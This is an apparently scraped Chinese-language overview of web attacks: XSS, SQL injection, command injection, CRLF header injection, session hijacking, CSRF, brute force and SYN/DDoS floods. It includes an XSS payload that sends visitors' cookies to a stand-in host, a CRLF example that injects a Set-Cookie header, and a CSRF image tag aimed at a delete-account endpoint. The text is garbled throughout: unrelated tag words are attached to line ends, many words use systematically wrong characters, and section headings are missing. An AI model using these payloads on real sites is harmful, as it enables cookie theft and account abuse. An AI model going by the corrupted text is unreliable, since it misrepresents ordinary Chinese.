对web的攻击可分为两大类:javascript
Cross SiteScript,跨站脚本攻击,又称css攻击。 css
其核心思路就是将恶意html代码注入到目标网站中(如<script type="text/javascript">alert('boom!')</script>),因此常常发生在动态生成html的场景下。 html
攻击成功后能够作的事情有不少,好比将cookie发送出去,URL跳转等。java
只要有用户输入的地方,数据存储时没有对其进行处理,用到改数据的页面都有可能受到XSS攻击(对于script的攻击方式,数据以直接拍到页面的方式才会使攻击生效,ajax请求到数据再经过mvvm框架渲染的方式是不会触发脚本的执行的。但,XSS攻击不只仅局限于script)web
拿微博举例,若是某人发了一段包含<script>window.open(“www.aa.com?param=”+document.cookie)</script>的微博,且XSS攻击成功,那么看到该微博的人都会受到攻击,其cookie被发送至www.aa.comajax
在web应用对数据库的查询,添加,删除等操做环节,请求参数参与SQL语句生成,对于调用SQL语句的拼接环节存在疏忽,产生SQL注入攻击。shell
举例:todo数据库
todoapi
web应用能够经过shell调用系统命令,所以若是在调用时存在疏忽,就有可能执行了不被指望的OS命令。安全
%0D%0A表明HTTP报文中的换行符。好比在响应头中的Location:www.a.com/aa?id=999
添加为Location:www.a.com/aa?id=999%0D%0ASet-Cookie: xxxx
,那么就会多出一个set-cookie响应头。此外,连续出现两次%0D%0标志着http头部与主体的分离,一样能够利用这个来修改响应主体。
指的是攻击者经过在响应头部字段中插入换行,添加任意响应首部的一种攻击
话管理疏忽引发的安全漏洞
经过手段拿到用户的会话id并以此id假装为用户de攻击。
指攻击者经过事先设定好的陷阱,在用户不知道的状况下发起对某些站点的请求,从而达到修改用户在目标网站里的数据的攻击。
如在a.com里有个<img src="b.com/account/delete" />的标签,此时用户访问a站点时就向b发起了delete请求,假设该接口就是b站点的删除账号api,且b用户偏偏刚访问了b站点不久,还存有未过时的cookie,那就惨了。
事先收集好一组候选密码一一尝试
如银行密码是四位数字,则穷举便可。
连接描述
一种让运行中的服务器呈中止中的攻击
分布式的多台计算机发起的dos攻击称为ddos(distributed Denial of Service)攻击
在第三次握手环节耍流氓不响应服务器,形成tcp半链接状态。不停地发送syn握手,就会形成服务器资源大大消耗。
或者tcp全链接,可是每一个链接都不释放,最终达到服务器上限,瘫痪
1.制造大流量无用数据,形成通往被攻击主机的网络拥塞,使被攻击主机没法正常和外界通讯。
2.利用被攻击主机提供服务或传输协议上处理重复链接的缺陷,反复高频的发出攻击性的重复服务请求,使被攻击主机没法及时处理其它正常的请求。
3.利用被攻击主机所提供服务程序或传输协议的自己实现缺陷,反复发送畸形的攻击数据引起系统错误的分配大量系统资源,使主机处于挂起状态甚至死机。
直接使服务器挂掉,影响了公司服务正常运转
location / { deny 1.2.3.4; }